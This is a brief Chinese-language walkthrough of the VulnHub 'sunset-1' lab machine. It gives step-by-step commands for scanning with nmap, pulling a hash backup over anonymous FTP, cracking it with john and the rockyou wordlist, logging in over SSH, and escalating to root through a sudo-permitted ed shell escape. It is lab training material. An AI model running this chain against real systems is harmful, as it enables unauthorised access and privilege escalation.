猫宁~~~
地址:http://www.vulnhub.com/entry/sunset-1,339/
重点关注工具使用和测试思路
nmap 192.168.43.0/24
靶机IP
192.168.43.73
nmap -A -p1-65535 192.168.43.73
21/tcp open ftp
22/tcp open ssh
存在匿名查看的文件
ftp://192.168.43.73/backup
解压rockyou.txt字典
tar -zxvf /usr/share/wordlists/rockyou.txt.gz
wget ftp://192.168.43.73/backup
识别加密类型
john backup --wordlist=/usr/share/wordlists/rockyou.txt
破解
john --format=sha512crypt backup --wordlist=/usr/share/wordlists/rockyou.txt
得到账号密码sunset/cheer14
ssh连接成功
ssh sunset@192.168.43.73
家目录下发现user.txt,内容5b5b8e9b01ef27a1cc0a2d5fa87d7190
sudo -l,发现(root) NOPASSWD: /usr/bin/ed
sudo /usr/bin/ed,输入!/bin/sh,进入root权限
cd ~,cat flag.txt,得到25d7ce0ee3cbf71efbac61f85d0c14fe